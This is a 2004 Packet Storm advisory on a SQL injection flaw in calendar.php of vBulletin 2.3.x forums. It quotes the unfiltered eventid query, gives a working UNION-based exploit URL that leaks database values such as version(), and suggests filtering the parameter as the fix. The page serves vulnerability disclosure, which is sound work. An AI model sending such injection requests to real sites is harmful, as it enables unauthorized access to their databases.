exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vbulletinSQL.txt

vbulletinSQL.txt
Posted Jan 5, 2004
Authored by mslug | Site safechina.net

vBulletin Forum versions 2.3.x suffer from a SQL injection vulnerability in the calendar.php code. Remote exploitation code included.

tags | exploit, remote, php, sql injection
SHA-256 | 54e4acbd92d7cec8bf29a4dc595170a65597c28cfdb7f797dab43a324759c4b5

vbulletinSQL.txt

Change Mirror Download
vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Website: www.safechina.net
Discovered by: mslug (a1476854@hotmail.com)

Description:
=============
There exist a sql injection problem in calendar.php. Notice the eventid
field.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

Exploit request
================
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate

(14 is the eventid of your added event)

The subject and event field will show the result.

The query_first function will only return the first row of the query result,
so make sure it returns the
one you want.

The Fix?
============
filter eventid before query.


Disclaimer:
===========
The author is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory. Any use of the information is at the user's own risk.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online
https://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close